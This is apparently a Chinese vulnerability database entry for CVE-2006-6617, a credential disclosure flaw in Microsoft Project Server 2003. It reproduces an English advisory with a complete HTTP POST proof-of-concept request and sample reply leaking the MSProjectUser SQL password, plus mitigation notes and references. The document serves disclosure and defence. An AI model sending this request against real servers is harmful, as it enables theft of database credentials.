Microsoft Project Server 2003 'PDSRequest.ASP' XML请求信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192441 漏洞类型 设计错误
发布时间 2006-12-18 更新时间 2006-12-18
CVE编号 CVE-2006-6617 CNNVD-ID CNNVD-200612-390
漏洞平台 N/A CVSS评分 6.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006120115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-390
|漏洞详情
MicrosoftProjectServer2003中的projectserver/logon/pdsrequest.asp存在信息泄露漏洞。远程认证用户可以通过GetInitializationData请求获取SQL数据库的MSProjectUser密码(在响应的UserName和Password标签中包含该信息)。
|漏洞EXP
==============================================================
% Project Server 2003 - Credential Disclosure
% brett.moore (at) security-assessment (dot) com [email concealed]
==============================================================

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--------------------------------------------------------------
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=<valid cookie>

<Request>
<GetInitializationData>
<Release>1</Release>
</GetInitializationData>
</Request>

<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName>              <----
<Password>sekretpass</Password>                 <----
<UserNTAccount>SERVERUSER</UserNTAccount>
</GetLoginInformation>
</Reply>
--------------------------------------------------------------

Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a 
  login with a valid username and password.
* Since the thick client is 'client side' any sql can be 
  manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also 
  be able to be made through this method.

==============================================================
% 
==============================================================
|参考资料

来源:BID
名称:21611
链接:http://www.securityfocus.com/bid/21611
来源:BUGTRAQ
名称:20061214ProjectServer2003-CredentialDisclosure
链接:http://www.securityfocus.com/archive/1/archive/1/454497/100/0/threaded
来源:XF
名称:projectserver-pdsrequest-info-disclosure(30905)
链接:http://xforce.iss.net/xforce/xfdb/30905
来源:VUPEN
名称:ADV-2006-5038
链接:http://www.frsirt.com/english/advisories/2006/5038
来源:SECTRACK
名称:1017388
链接:http://securitytracker.com/id?1017388
来源:SREASON
名称:2047
链接:http://securityreason.com/securityalert/2047
来源:SECUNIA
名称:23391
链接:http://secunia.com/advisories/23391
来源:FULLDISC
名称:20061214ProjectServer2003-CredentialDisclosure
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051316.html